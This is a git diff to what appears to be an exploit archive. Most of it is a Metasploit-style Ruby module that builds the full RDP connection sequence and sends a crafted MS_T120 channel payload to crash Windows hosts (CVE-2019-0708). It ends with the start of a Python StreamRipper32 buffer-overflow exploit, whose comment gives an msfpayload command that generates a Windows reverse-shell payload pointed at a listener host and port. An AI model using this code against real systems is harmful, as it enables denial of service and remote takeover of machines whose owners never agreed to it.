+ ## After negotiating TLS or NLA the connectInitial packet needs to include the
+ ## protocol selection that the server indicated in its negotiation response.
+
+ ## TODO: If this is pulled into an RDP library then the channel list likely
+ ## needs to be build dynamically. For example, MS_T120 likely should only
+ ## ever be sent as part of checks for CVE-2019-0708.
+
+ ## build clientName - 12.2.1.3.2 Client Core Data (TS_UD_CS_CORE)
+ ## 15 characters + null terminator, converted to unicode
+ ## fixed length - 32 characters total
+ name_unicode = Rex::Text.to_unicode(host_name[0..14], type = 'utf-16le')
+ name_unicode += "\x00" * (32 - name_unicode.length)
+
+ pdu = "\x7f\x65" + # T.125 Connect-Initial (BER: Application 101)
+ "\x82\x01\xb2" + # Length (BER: Length)
+ "\x04\x01\x01" + # CallingDomainSelector: 1 (BER: OctetString)
+ "\x04\x01\x01" + # CalledDomainSelector: 1 (BER: OctetString)
+ "\x01\x01\xff" + # UpwaredFlag: True (BER: boolean)
+
+ ## Connect-Initial: Target Parameters
+ "\x30\x19" + # TargetParamenters (BER: SequenceOf)
+ ## *** not sure why the BER encoded Integers below have 2 byte values instead of one ***
+ "\x02\x01\x22\x02\x01\x02\x02\x01\x00\x02\x01\x01\x02\x01\x00\x02\x01\x01\x02\x02\xff\xff\x02\x01\x02" +
+
+ ## Connect-Intial: Minimum Parameters
+ "\x30\x19" + # MinimumParameters (BER: SequencOf)
+ "\x02\x01\x01\x02\x01\x01\x02\x01\x01\x02\x01\x01\x02\x01\x00\x02\x01\x01\x02\x02\x04\x20\x02\x01\x02" +
+
+ ## Connect-Initial: Maximum Parameters
+ "\x30\x1c" + # MaximumParameters (BER: SequencOf)
+ "\x02\x02\xff\xff\x02\x02\xfc\x17\x02\x02\xff\xff\x02\x01\x01\x02\x01\x00\x02\x01\x01\x02\x02\xff\xff\x02\x01\x02" +
+
+ ## Connect-Initial: UserData
+ "\x04\x82\x01\x51" + # UserData, length 337 (BER: OctetString)
+
+ ## T.124 GCC Connection Data (ConnectData) - PER Encoding used
+ "\x00\x05" + # object length
+ "\x00\x14\x7c\x00\x01" + # object: OID 0.0.20.124.0.1 = Generic Conference Control
+ "\x81\x48" + # Length: ??? (Connect PDU)
+ "\x00\x08\x00\x10\x00\x01\xc0\x00" + # T.124 Connect PDU, Conference name 1
+ "\x44\x75\x63\x61" + # h221NonStandard: 'Duca' (client-to-server H.221 key)
+ "\x81\x3a" + # Length: ??? (T.124 UserData section)
+
+ ## Client MCS Section - 2.2.1.3
+ "\x01\xc0" + # clientCoreData (TS_UD_CS_CORE) header - 2.2.1.3.2
+ "\xea\x00" + # Length: 234 (includes header)
+ "\x0a\x00\x08\x00" + # version: 8.1 (RDP 5.0 -> 8.1)
+ "\x80\x07" + # desktopWidth: 1920
+ "\x38\x04" + # desktopHeigth: 1080
+ "\x01\xca" + # colorDepth: 8 bpp
+ "\x03\xaa" + # SASSequence: 43523
+ "\x09\x04\x00\x00" + # keyboardLayout: 1033 (English US)
+ "\xee\x42\x00\x00" + # clientBuild: ????
+ [name_unicode].pack("a*") + # clientName
+ "\x04\x00\x00\x00" + # keyboardType: 4 (IBMEnhanced 101 or 102)
+ "\x00\x00\x00\x00" + # keyboadSubtype: 0
+ "\x0c\x00\x00\x00" + # keyboardFunctionKey: 12
+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + # imeFileName (64 bytes)
+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
+ "\x01\xca" + # postBeta2ColorDepth: 8 bpp
+ "\x01\x00" + # clientProductID: 1
+ "\x00\x00\x00\x00" + # serialNumber: 0
+ "\x18\x00" + # highColorDepth: 24 bpp
+ "\x0f\x00" + # supportedColorDepths: flag (24 bpp | 16 bpp | 15 bpp)
+ "\xaf\x07" + # earlyCapabilityFlags
+ "\x62\x00\x63\x00\x37\x00\x38\x00\x65\x00\x66\x00\x36\x00\x33\x00" + # clientDigProductID (64 bytes)
+ "\x2d\x00\x39\x00\x64\x00\x33\x00\x33\x00\x2d\x00\x34\x00\x31\x00" +
+ "\x39\x38\x00\x38\x00\x2d\x00\x39\x00\x32\x00\x63\x00\x66\x00\x2d" +
+ "\x00\x00\x31\x00\x62\x00\x32\x00\x64\x00\x61\x00\x42\x42\x42\x42" +
+ "\x07" + # connectionType: 7
+ "\x00" + # pad1octet
+
+ ## serverSelectedProtocol - After negotiating TLS or CredSSP this value
+ ## must match the selectedProtocol value from the server's Negotiate
+ ## Connection confirm PDU that was sent before encryption was started.
+ [selected_proto].pack('L<') + # "\x01\x00\x00\x00"
+
+ "\x56\x02\x00\x00" +
+ "\x50\x01\x00\x00" +
+ "\x00\x00" +
+ "\x64\x00\x00\x00" +
+ "\x64\x00\x00\x00" +
+
+ "\x04\xc0" + # clientClusterdata (TS_UD_CS_CLUSTER) header - 2.2.1.3.5
+ "\x0c\x00" + # Length: 12 (includes header)
+ "\x15\x00\x00\x00" + # flags (REDIRECTION_SUPPORTED | REDIRECTION_VERSION3)
+ "\x00\x00\x00\x00" + # RedirectedSessionID
+ "\x02\xc0" + # clientSecuritydata (TS_UD_CS_SEC) header - 2.2.1.3.3
+ "\x0c\x00" + # Length: 12 (includes header)
+ "\x1b\x00\x00\x00" + # encryptionMethods: 3 (40 bit | 128 bit)
+ "\x00\x00\x00\x00" + # extEncryptionMethods (French locale only)
+ "\x03\xc0" + # clientNetworkData (TS_UD_CS_NET) - 2.2.1.3.4
+ "\x38\x00" + # Length: 56 (includes header)
+ channels_defs
+
+ ## Fix. for packet modification.
+ ## T.125 Connect-Initial
+ size_1 = [pdu.length - 5].pack("s") # Length (BER: Length)
+ pdu[3] = size_1[1]
+ pdu[4] = size_1[0]
+
+ ## Connect-Initial: UserData
+ size_2 = [pdu.length - 102].pack("s") # UserData, length (BER: OctetString)
+ pdu[100] = size_2[1]
+ pdu[101] = size_2[0]
+
+ ## T.124 GCC Connection Data (ConnectData) - PER Encoding used
+ size_3 = [pdu.length - 111].pack("s") # Length (Connect PDU)
+ pdu[109] = "\x81"
+ pdu[110] = size_3[0]
+
+ size_4 = [pdu.length - 125].pack("s") # Length (T.124 UserData section)
+ pdu[123] = "\x81"
+ pdu[124] = size_4[0]
+
+ ## Client MCS Section - 2.2.1.3
+ size_5 = [pdu.length - 383].pack("s") # Length (includes header)
+ pdu[385] = size_5[0]
+
+ rdp_build_data_tpdu(pdu)
+ end
+
+ ## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/9cde84cd-5055-475a-ac8b-704db419b66f
+ ## Client Security Exchange PDU - 2.2.1.10
+ def pdu_security_exchange(rcran, rsexp, rsmod, bitlen)
+ encrypted_rcran_bignum = rsa_encrypt(rcran, rsexp, rsmod)
+ encrypted_rcran = int_to_bytestring(encrypted_rcran_bignum)
+
+ bitlen += 8 # Pad with size of TS_SECURITY_PACKET header
+
+ userdata_length = 8 + bitlen
+ userdata_length_low = userdata_length & 0xFF
+ userdata_length_high = userdata_length / 256
+ flags = 0x80 | userdata_length_high
+
+ pdu = "\x64" + # T.125 sendDataRequest
+ "\x00\x08" + # intiator userId
+ "\x03\xeb" + # channelId = 1003
+ "\x70" + # dataPriority = high, segmentation = begin | end
+ [flags].pack("C") +
+ [userdata_length_low].pack("C") + # UserData length
+
+ # TS_SECURITY_PACKET - 2.2.1.10.1
+ "\x01\x00" + # securityHeader flags
+ "\x00\x00" + # securityHeader flagsHi
+ [bitlen].pack("L<") + # TS_ length
+ encrypted_rcran + # encryptedClientRandom - 64 bytes
+ "\x00\x00\x00\x00\x00\x00\x00\x00" # 8 bytes rear padding (always present)
+
+ return(rdp_build_data_tpdu(pdu))
+ end
+
+ ## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/04c60697-0d9a-4afd-a0cd-2cc133151a9c
+ ## Client MCS Erect Domain Request PDU - 2.2.1.5
+ def pdu_erect_domain_request()
+ pdu = "\x04" + # T.125 ErectDomainRequest
+ "\x01\x00" + # subHeight - length 1, value 0
+ "\x01\x00" # subInterval - length 1, value 0
+
+ return(rdp_build_data_tpdu(pdu))
+ end
+
+ ## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/f5d6a541-9b36-4100-b78f-18710f39f247\
+ ## Client MCS Attach User Request PDU - 2.2.1.6
+ def pdu_attach_user_request()
+ pdu = "\x28" # T.125 AttachUserRequest
+
+ return(rdp_build_data_tpdu(pdu))
+ end
+
+ ## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/64564639-3b2d-4d2c-ae77-1105b4cc011b
+ ## Client MCS Channel Join Request PDU -2.2.1.8
+ def pdu_channel_request(user1, channel_id)
+ pdu = "\x38" + [user1, channel_id].pack("nn") # T.125 ChannelJoinRequest
+
+ return(rdp_build_data_tpdu(pdu))
+ end
+
+ ## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/772d618e-b7d6-4cd0-b735-fa08af558f9d
+ ## TS_INFO_PACKET - 2.2.1.11.1.1
+ def pdu_client_info(user_name, domain_name = "", ip_address = "")
+ ## Max. len for 4.0/6.0 servers is 44 bytes including terminator.
+ ## Max. len for all other versions is 512 including terminator.
+ ## We're going to limit to 44 (21 chars + null -> unicode) here.
+
+ ## Blank username is valid, nil = random.
+ user_name = Rex::Text.rand_text_alpha(10) if user_name.nil?
+ user_unicode = Rex::Text.to_unicode(user_name[0..20], type = 'utf-16le')
+ uname_len = user_unicode.length
+
+ ## Domain can can be, and for rdesktop typically is, empty.
+ ## Max. len for 4.0/5.0 servers is 52 including terminator.
+ ## Max. len for all other versions is 512 including terminator.
+ ## We're going to limit to 52 (25 chars + null -> unicode) here.
+ domain_unicode = Rex::Text.to_unicode(domain_name[0..24], type = 'utf-16le')
+ domain_len = domain_unicode.length
+
+ ## This address value is primarily used to reduce the fields by which this
+ ## module can be fingerprinted. It doesn't show up in Windows logs.
+ ## clientAddress + null terminator
+ ip_unicode = Rex::Text.to_unicode(ip_address, type = 'utf-16le') + "\x00\x00"
+ ip_len = ip_unicode.length
+
+ pdu = "\xa1\xa5\x09\x04" +
+ "\x09\x04\xbb\x47" + # CodePage
+ "\x03\x00\x00\x00" + # flags - INFO_MOUSE, INFO_DISABLECTRLALTDEL, INFO_UNICODE, INFO_MAXIMIZESHELL, INFO_ENABLEWINDOWSKEY
+ [domain_len].pack("S<") + # cbDomain (length value) - EXCLUDES null terminator
+ [uname_len].pack("S<") + # cbUserName (length value) - EXCLUDES null terminator
+ "\x00\x00" + # cbPassword (length value)
+ "\x00\x00" + # cbAlternateShell (length value)
+ "\x00\x00" + # cbWorkingDir (length value)
+ [domain_unicode].pack("a*") + # Domain
+ "\x00\x00" + # Domain null terminator, EXCLUDED from value of cbDomain
+ [user_unicode].pack("a*") + # UserName
+ "\x00\x00" + # UserName null terminator, EXCLUDED FROM value of cbUserName
+ "\x00\x00" + # Password - empty
+ "\x00\x00" + # AlternateShell - empty
+
+ ## TS_EXTENDED_INFO_PACKET - 2.2.1.11.1.1.1
+ "\x02\x00" + # clientAddressFamily - AF_INET - FIXFIX - detect and set dynamically
+ [ip_len].pack("S<") + # cbClientAddress (length value) - INCLUDES terminator ... for reasons.
+ [ip_unicode].pack("a*") + # clientAddress (unicode + null terminator (unicode)
+
+ "\x3c\x00" + # cbClientDir (length value): 60
+ "\x43\x00\x3a\x00\x5c\x00\x57\x00\x49\x00\x4e\x00\x4e\x00\x54\x00" + # clientDir - 'C:\WINNT\System32\mstscax.dll' + null terminator
+ "\x5c\x00\x53\x00\x79\x00\x73\x00\x74\x00\x65\x00\x6d\x00\x33\x00" +
+ "\x32\x00\x5c\x00\x6d\x00\x73\x00\x74\x00\x73\x00\x63\x00\x61\x00" +
+ "\x78\x00\x2e\x00\x64\x00\x6c\x00\x6c\x00\x00\x00" +
+
+ ## clientTimeZone - TS_TIME_ZONE struct - 172 bytes
+ ## These are the default values for rdesktop
+ "\xa4\x01\x00\x00" + # Bias
+
+ ## StandardName - 'GTB,normaltid'
+ "\x4d\x00\x6f\x00\x75\x00\x6e\x00\x74\x00\x61\x00\x69\x00\x6e\x00" +
+ "\x20\x00\x53\x00\x74\x00\x61\x00\x6e\x00\x64\x00\x61\x00\x72\x00" +
+ "\x64\x00\x20\x00\x54\x00\x69\x00\x6d\x00\x65\x00\x00\x00\x00\x00" +
+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
+ "\x00\x00\x0b\x00\x00\x00\x01\x00\x02\x00\x00\x00\x00\x00\x00\x00" + # StandardDate
+ "\x00\x00\x00\x00" + # StandardBias
+
+ ## DaylightName - 'GTB,sommartid'
+ "\x4d\x00\x6f\x00\x75\x00\x6e\x00\x74\x00\x61\x00\x69\x00\x6e\x00" +
+ "\x20\x00\x44\x00\x61\x00\x79\x00\x6c\x00\x69\x00\x67\x00\x68\x00" +
+ "\x74\x00\x20\x00\x54\x00\x69\x00\x6d\x00\x65\x00\x00\x00\x00\x00" +
+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
+ "\x00\x00\x03\x00\x00\x00\x02\x00\x02\x00\x00\x00\x00\x00\x00\x00" + # DaylightDate
+ "\xc4\xff\xff\xff" + # DaylightBias
+
+ "\x01\x00\x00\x00" + # clientSessionId
+ "\x06\x00\x00\x00" + # performanceFlags
+ "\x00\x00" + # cbAutoReconnectCookie
+ "\x64\x00\x00\x00"
+
+ return(pdu)
+ end
+
+ # https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/4e9722c3-ad83-43f5-af5a-529f73d88b48
+ # Confirm Active PDU Data - TS_CONFIRM_ACTIVE_PDU - 2.2.1.13.2.1
+ def pdu_client_confirm_active()
+ pdu = "\xea\x03\x01\x00" + # shareId: 66538
+ "\xea\x03" + # originatorId
+ "\x06\x00" + # lengthSourceDescriptor: 6
+ "\x3e\x02" + # lengthCombinedCapabilities: ???
+ "\x4d\x53\x54\x53\x43\x00" + # SourceDescriptor: 'MSTSC'
+ "\x17\x00" + # numberCapabilities: 23
+ "\x00\x00" + # pad2Octets
+ "\x01\x00" + # capabilitySetType: 1 - TS_GENERAL_CAPABILITYSET
+ "\x18\x00" + # lengthCapability: 24
+ "\x01\x00\x03\x00\x00\x02\x00\x00\x00\x00\x1d\x04\x00\x00\x00\x00" +
+ "\x00\x00\x00\x00" +
+ "\x02\x00" + # capabilitySetType: 2 - TS_BITMAP_CAPABILITYSET
+ "\x1c\x00" + # lengthCapability: 28
+ "\x20\x00\x01\x00\x01\x00\x01\x00\x80\x07\x38\x04\x00\x00\x01\x00" +
+ "\x01\x00\x00\x1a\x01\x00\x00\x00" +
+ "\x03\x00" + # capabilitySetType: 3 - TS_ORDER_CAPABILITYSET
+ "\x58\x00" + # lengthCapability: 88
+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
+ "\x00\x00\x00\x00\x01\x00\x14\x00\x00\x00\x01\x00\x00\x00\xaa\x00" +
+ "\x01\x01\x01\x01\x01\x00\x00\x01\x01\x01\x00\x01\x00\x00\x00\x01" +
+ "\x01\x01\x01\x01\x01\x01\x01\x00\x01\x01\x01\x00\x00\x00\x00\x00" +
+ "\xa1\x06\x06\x00\x00\x00\x00\x00\x00\x84\x03\x00\x00\x00\x00\x00" +
+ "\xe4\x04\x00\x00\x13\x00\x28\x00\x03\x00\x00\x03\x78\x00\x00\x00" +
+ "\x78\x00\x00\x00\xfc\x09\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00" +
+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
+ "\x0a\x00" + # capabilitySetType: 10 - ??
+ "\x08\x00" + # lengthCapability: 8
+ "\x06\x00\x00\x00" +
+ "\x07\x00" + # capabilitySetType: 7 - TSWINDOWACTIVATION_CAPABILITYSET
+ "\x0c\x00" + # lengthCapability: 12
+ "\x00\x00\x00\x00\x00\x00\x00\x00" +
+ "\x05\x00" + # capabilitySetType: 5 - TS_CONTROL_CAPABILITYSET
+ "\x0c\x00" + # lengthCapability: 12
+ "\x00\x00\x00\x00\x02\x00\x02\x00" +
+ "\x08\x00" + # capabilitySetType: 8 - TS_POINTER_CAPABILITYSET
+ "\x0a\x00" + # lengthCapability: 10
+ "\x01\x00\x14\x00\x15\x00" +
+ "\x09\x00" + # capabilitySetType: 9 - TS_SHARE_CAPABILITYSET
+ "\x08\x00" + # lengthCapability: 8
+ "\x00\x00\x00\x00" +
+ "\x0d\x00" + # capabilitySetType: 13 - TS_INPUT_CAPABILITYSET
+ "\x58\x00" + # lengthCapability: 88
+ "\x91\x00\x20\x00\x09\x04\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00" +
+ "\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
+ "\x00\x00\x00\x00" +
+ "\x0c\x00" + # capabilitySetType: 12 - TS_SOUND_CAPABILITYSET
+ "\x08\x00" + # lengthCapability: 8
+ "\x01\x00\x00\x00" +
+ "\x0e\x00" + # capabilitySetType: 14 - TS_FONT_CAPABILITYSET
+ "\x08\x00" + # lengthCapability: 8
+ "\x01\x00\x00\x00" +
+ "\x10\x00" + # capabilitySetType: 16 - TS_GLYPHCAChE_CAPABILITYSET
+ "\x34\x00" + # lengthCapability: 52
+ "\xfe\x00\x04\x00\xfe\x00\x04\x00\xfe\x00\x08\x00\xfe\x00\x08\x00" +
+ "\xfe\x00\x10\x00\xfe\x00\x20\x00\xfe\x00\x40\x00\xfe\x00\x80\x00" +
+ "\xfe\x00\x00\x01\x40\x00\x00\x08\x00\x01\x00\x01\x03\x00\x00\x00" +
+ "\x0f\x00" + # capabilitySetType: 15 - TS_BRUSH_CAPABILITYSET
+ "\x08\x00" + # lengthCapability: 8
+ "\x01\x00\x00\x00" +
+ "\x11\x00" + # capabilitySetType: ??
+ "\x0c\x00" + # lengthCapability: 12
+ "\x01\x00\x00\x00\x00\x28\x64\x00" +
+ "\x14\x00" + # capabilitySetType: ??
+ "\x0c\x00" + # lengthCapability: 12
+ "\x01\x00\x00\x00\x00\x00\x00\x00" +
+ "\x15\x00" + # capabilitySetType: ??
+ "\x0c\x00" + # lengthCapability: 12
+ "\x02\x00\x00\x00\x00\x0a\x00\x01" +
+ "\x1a\x00" + # capabilitySetType: ??
+ "\x08\x00" + # lengthCapability: 8
+ "\xaf\x94\x00\x00" +
+ "\x1c\x00" + # capabilitySetType: ??
+ "\x0c\x00" + # lengthCapability: 12
+ "\x12\x00\x00\x00\x00\x00\x00\x00" +
+ "\x1b\x00" + # capabilitySetType: ??
+ "\x06\x00" + # lengthCapability: 6
+ "\x01\x00" +
+ "\x1e\x00" + # capabilitySetType: ??
+ "\x08\x00" + # lengthCapability: 8
+ "\x01\x00\x00\x00" +
+ "\x18\x00" + # capabilitySetType: ??
+ "\x0b\x00" + # lengthCapability: 11
+ "\x02\x00\x00\x00\x03\x0c\x00" +
+ "\x1d\x00" + # capabilitySetType: ??
+ "\x5f\x00" + # lengthCapability: 95
+ "\x02\xb9\x1b\x8d\xca\x0f\x00\x4f\x15\x58\x9f\xae\x2d\x1a\x87\xe2" +
+ "\xd6\x01\x03\x00\x01\x01\x03\xd4\xcc\x44\x27\x8a\x9d\x74\x4e\x80" +
+ "\x3c\x0e\xcb\xee\xa1\x9c\x54\x05\x31\x00\x31\x00\x00\x00\x01\x00" +
+ "\x00\x00\x25\x00\x00\x00\xc0\xcb\x08\x00\x00\x00\x01\x00\xc1\xcb" +
+ "\x1d\x00\x00\x00\x01\xc0\xcf\x02\x00\x08\x00\x00\x01\x40\x00\x02" +
+ "\x01\x01\x01\x00\x01\x40\x00\x02\x01\x01\x04"
+
+ ## type = 0x13 = TS_PROTOCOL_VERSION | PDUTYPE_CONFIRMACTIVEPDU
+ return(rdp_build_share_control_header(0x13, pdu))
+ end
+
+ ## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/5186005a-36f5-4f5d-8c06-968f28e2d992
+ ## Client Synchronize - TS_SYNCHRONIZE_PDU - 2.2.1.19 / 2.2.14.1
+ def pdu_client_synchronize(target_user = 0)
+ pdu = "\x01\x00" + # messageType: 1 SYNCMSGTYPE_SYNC
+ [target_user].pack("S<") # targetUser, 16 bit, unsigned.
+
+ ## pduType2 = 0x1f = 31 - PDUTYPE2_SCYNCHRONIZE
+ data_header = rdp_build_share_data_header(0x1f, pdu)
+
+ ## type = 0x17 = TS_PROTOCOL_VERSION | PDUTYPE_DATAPDU
+ return(rdp_build_share_control_header(0x17, data_header))
+ end
+
+ ## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/9d1e1e21-d8b4-4bfd-9caf-4b72ee91a7135
+ ## Control Cooperate - TC_CONTROL_PDU 2.2.1.15
+ def pdu_client_control_cooperate()
+ pdu = "\x04\x00" + # action: 4 - CTRLACTION_COOPERATE
+ "\x00\x00" + # grantId: 0
+ "\x00\x00\x00\x00" # controlId: 0
+
+ ## pduType2 = 0x14 = 20 - PDUTYPE2_CONTROL
+ data_header = rdp_build_share_data_header(0x14, pdu)
+
+ ## type = 0x17 = TS_PROTOCOL_VERSION | PDUTYPE_DATAPDU
+ return(rdp_build_share_control_header(0x17, data_header))
+ end
+
+
+ ## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/4f94e123-970b-4242-8cf6-39820d8e3d35
+ ## Control Request - TC_CONTROL_PDU 2.2.1.16
+ def pdu_client_control_request()
+
+ pdu = "\x01\x00" + # action: 1 - CTRLACTION_REQUEST_CONTROL
+ "\x00\x00" + # grantId: 0
+ "\x00\x00\x00\x00" # controlId: 0
+
+ ## pduType2 = 0x14 = 20 - PDUTYPE2_CONTROL
+ data_header = rdp_build_share_data_header(0x14, pdu)
+
+ ## type = 0x17 = TS_PROTOCOL_VERSION | PDUTYPE_DATAPDU
+ return(rdp_build_share_control_header(0x17, data_header))
+ end
+
+ ## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/ff7f06f8-0dcf-4c8d-be1f-596ae60c4396
+ ## Client Input Event Data - TS_INPUT_PDU_DATA - 2.2.8.1.1.3.1
+ def pdu_client_input_event_sychronize()
+ pdu = "\x01\x00" + # numEvents: 1
+ "\x00\x00" + # pad2Octets
+ "\x00\x00\x00\x00" + # eventTime
+ "\x00\x00" + # messageType: 0 - INPUT_EVENT_SYNC
+
+ ## TS_SYNC_EVENT 202.8.1.1.3.1.1.5
+ "\x00\x00" + # pad2Octets
+ "\x00\x00\x00\x00" # toggleFlags
+
+ ## pduType2 = 0x1c = 28 - PDUTYPE2_INPUT
+ data_header = rdp_build_share_data_header(0x1c, pdu)
+
+ ## type = 0x17 = TS_PROTOCOL_VERSION | PDUTYPE_DATAPDU
+ return(rdp_build_share_control_header(0x17, data_header))
+ end
+
+ ## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/7067da0d-e318-4464-88e8-b11509cf0bd9
+ ## Client Font List - TS_FONT_LIST_PDU - 2.2.1.18
+ def pdu_client_font_list()
+ pdu = "\x00\x00" + # numberFonts: 0
+ "\x00\x00" + # totalNumberFonts: 0
+ "\x03\x00" + # listFlags: 3 (FONTLIST_FIRST | FONTLIST_LAST)
+ "\x32\x00" # entrySize: 50
+
+ ## pduType2 = 0x27 = 29 - PDUTYPE2_FONTLIST
+ data_header = rdp_build_share_data_header(0x27, pdu)
+
+ ## type = 0x17 = TS_PROTOCOL_VERSION | PDUTYPE_DATAPDU
+ return(rdp_build_share_control_header(0x17, data_header))
+ end
+
+ # ------------------------------------------------------------------------- #
+
+ def crash_test(rc4enckey, hmackey)
+ begin
+ received = ""
+ for i in 0..5
+ received += rdp_recv()
+ end
+ rescue RdpCommunicationError
+ # we don't care
+ end
+
+ vprint_status("Sending DoS payload")
+ found = false
+ for j in 0..15
+ ## x86_payload:
+ rdp_send(rdp_build_pkt(rdp_build_virtual_channel_pdu(0x03, ["00000000020000000000000"].pack("H*")), rc4enckey, hmackey, "\x03\xef"))
+
+ ## x64_payload:
+ rdp_send(rdp_build_pkt(rdp_build_virtual_channel_pdu(0x03, ["00000000000000000200000"].pack("H*")), rc4enckey, hmackey, "\x03\xef"))
+ end
+ end
+
+ def produce_dos()
+
+ unless(rdp_connection_initiation())
+ vprint_status("Could not connect to RDP.")
+ return(false)
+ end
+
+ vprint_status("Sending initial client data")
+ received = rdp_sendrecv(pdu_connect_initial(RDPConstants::PROTOCOL_RDP, datastore['RDP_CLIENT_NAME']))
+
+ rsmod, rsexp, rsran, server_rand, bitlen = rdp_parse_connect_response(received)
+
+ vprint_status("Sending erect domain request")
+ rdp_send(pdu_erect_domain_request())
+
+ vprint_status("Sending attach user request")
+ received = rdp_sendrecv(pdu_attach_user_request())
+
+ user1 = received[9, 2].unpack("n").first
+
+ [1003, 1004, 1005, 1006, 1007].each do | chan |
+ rdp_sendrecv(pdu_channel_request(user1, chan))
+ end
+
+ ## 5.3.4 Client Random Value
+ client_rand = ''
+ 32.times { client_rand << rand(0..255) }
+ rcran = bytes_to_bignum(client_rand)
+
+ vprint_status("Sending security exchange PDU")
+ rdp_send(pdu_security_exchange(rcran, rsexp, rsmod, bitlen))
+
+ ## We aren't decrypting anything at this point. Leave the variables here
+ ## to make it easier to understand in the future.
+ rc4encstart, rc4decstart, hmackey, sessblob = rdp_calculate_rc4_keys(client_rand, server_rand)
+
+ vprint_status("RC4_ENC_KEY: #{bin_to_hex(rc4encstart)}")
+ vprint_status("RC4_DEC_KEY: #{bin_to_hex(rc4decstart)}")
+ vprint_status("HMAC_KEY: #{bin_to_hex(hmackey)}")
+ vprint_status("SESS_BLOB: #{bin_to_hex(sessblob)}")
+
+ rc4enckey = RC4.new(rc4encstart)
+
+ vprint_status("Sending client info PDU") # TODO
+ pdu = pdu_client_info(datastore['RDP_USER'], datastore['RDP_DOMAIN'], datastore['RDP_CLIENT_IP'])
+ received = rdp_sendrecv(rdp_build_pkt(pdu, rc4enckey, hmackey, "\x03\xeb", true))
+
+ vprint_status("Received License packet")
+ rdp_recv()
+
+ vprint_status("Sending client confirm active PDU")
+ rdp_send(rdp_build_pkt(pdu_client_confirm_active(), rc4enckey, hmackey))
+
+ vprint_status("Sending client synchronize PDU")
+ rdp_send(rdp_build_pkt(pdu_client_synchronize(1009), rc4enckey, hmackey))
+
+ vprint_status("Sending client control cooperate PDU")
+ rdp_send(rdp_build_pkt(pdu_client_control_cooperate(), rc4enckey, hmackey))
+
+ vprint_status("Sending client control request control PDU")
+ rdp_send(rdp_build_pkt(pdu_client_control_request(), rc4enckey, hmackey))
+
+ vprint_status("Sending client input sychronize PDU")
+ rdp_send(rdp_build_pkt(pdu_client_input_event_sychronize(), rc4enckey, hmackey))
+
+ vprint_status("Sending client font list PDU")
+ rdp_send(rdp_build_pkt(pdu_client_font_list(), rc4enckey, hmackey))
+
+ vprint_status("Sending close mst120 PDU")
+ crash_test(rc4enckey, hmackey)
+
+ vprint_status("Sending client disconnection PDU")
+ rdp_send(rdp_build_data_tpdu("\x21\x80"))
+
+ return(true)
+ end
+
+ # ------------------------------------------------------------------------- #
+
+ def run_host(ip)
+ ## Allow the run command to call the check command.
+ begin
+ if(open_connection())
+ status = produce_dos()
+ end
+ rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError, ::TypeError => e
+ bt = e.backtrace.join("\n")
+ vprint_error("Unexpected error: #{e.message}")
+ vprint_line(bt)
+ elog("#{e.message}\n#{bt}")
+ rescue RdpCommunicationError => e
+ vprint_error("Error communicating RDP protocol.")
+ status = Exploit::CheckCode::Unknown
+ rescue Errno::ECONNRESET => e # NLA?
+ vprint_error("Connection reset, possible NLA is enabled.")
+ rescue => e
+ bt = e.backtrace.join("\n")
+ vprint_error("Unexpected error: #{e.message}")
+ vprint_line(bt)
+ elog("#{e.message}\n#{bt}")
+ ensure
+
+ if(status == true)
+ sleep(1)
+ unless(open_connection())
+ print_good("The host is crashed!")
+ else
+ print_bad("The DoS has been sent but the host is already connected!")
+ end
+ end
+
+ disconnect()
+ end
+ end
+
+end
\ No newline at end of file
diff --git a/exploits/windows/local/47116.py b/exploits/windows/local/47116.py
new file mode 100755
index 000000000..f6cb7aba3
--- /dev/null
+++ b/exploits/windows/local/47116.py
@@ -0,0 +1,70 @@
+#!/usr/bin/python
+
+#Exploit Title: StreamRipper32 Buffer Overflow
+#Date: 07/2019
+#Exploit Author: Andrey Stoykov (OSCP)
+#Tested On: Win7 SP1 x64
+#Software Link: http://streamripper.sourceforge.net/sr32/StreamRipper32_2_6.exe
+#Version: 2.6
+#Steps To Reproduce: Double click on "Add" in the "Station/Song Section" and paste the output in "Song Pattern"
+
+file = open('exploit.txt', 'wb')
+
+#msfpayload windows/shell_reverse_tcp LHOST=192.168.56.6 EXITFUNC=thread LPORT=4444 R | msfencode -e x86/alpha_mixed -b "\x00\x0a\x0d\xb4\xb8\xbc\xbd\xbe" -f c
+
